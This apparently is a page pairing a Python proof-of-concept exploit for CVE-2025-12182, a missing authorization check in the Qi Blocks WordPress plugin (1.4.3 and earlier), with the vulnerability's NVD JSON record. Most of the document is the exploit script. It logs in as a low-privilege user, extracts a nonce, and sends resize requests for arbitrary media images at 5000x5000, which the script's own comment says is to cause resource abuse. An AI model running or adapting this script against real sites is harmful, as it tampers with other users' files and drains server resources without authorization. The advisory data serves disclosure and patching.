CVE-2025-12182

import requests import re # CVE-2025-12182 PoC - Qi Blocks Unauthorized Image Resize # Target: WordPress site with Qi Blocks plugin <= 1.4.3 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" def get_nonce(site_url): """Extract WordPress nonce for AJAX requests""" resp = requests.get(f"{site_url}/wp-admin/", timeout=10) nonce_match = re.search(r'nonce" value="([a-z0-9]+)"', resp.text) if nonce_match: return nonce_match.group(1) return None def exploit(site_url, username, password): """Exploit unauthorized image resize vulnerability""" session = requests.Session() # Step 1: Login to WordPress login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{site_url}/wp-admin/", 'testcookie': '1' } resp = session.post(f"{site_url}/wp-login.php", data=login_data, timeout=10) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Get AJAX nonce nonce = get_nonce(site_url) if not nonce: print("[-] Failed to get nonce") return False # Step 3: Get target image ID (any image in media library) # In real attack, attacker would enumerate image IDs target_image_id = 1 # Example image ID # Step 4: Trigger unauthorized image resize resize_data = { 'action': 'qi_blocks_resize_image', 'nonce': nonce, 'attachment_id': target_image_id, 'width': 5000, # Large size to cause resource abuse 'height': 5000 } resp = session.post(f"{site_url}/wp-admin/admin-ajax.php", data=resize_data, timeout=30) if resp.status_code == 200: print(f"[+] Image resize triggered for attachment ID: {target_image_id}") print(f"[+] Response: {resp.text[:200]}") return True else: print(f"[-] Request failed with status: {resp.status_code}") return False if __name__ == "__main__": exploit(TARGET_URL, USERNAME, PASSWORD)

{"cve": {"id": "CVE-2025-12182", "sourceIdentifier": "[email protected]", "published": "2025-11-15T04:15:55.570", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Qi Blocks plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the `resize_image_callback()` function in all versions up to, and including, 1.4.3. This is due to the plugin not properly verifying that a user has permission to resize a specific attachment. This makes it possible for authenticated attackers, with Contributor-level access and above, to resize arbitrary media library images belonging to other users, which can result in unintended file writes, disk consumption, and server resource abuse through processing of large images."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/qi-blocks/tags/1.4.3/inc/media/class-qi-blocks-media.php#L138", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3387712/qi-blocks/trunk/inc/media/class-qi-blocks-media.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/41b0b12f-ff52-4913-aa54-3fbaf0839959?source=cve", "source": "[email protected]"}]}}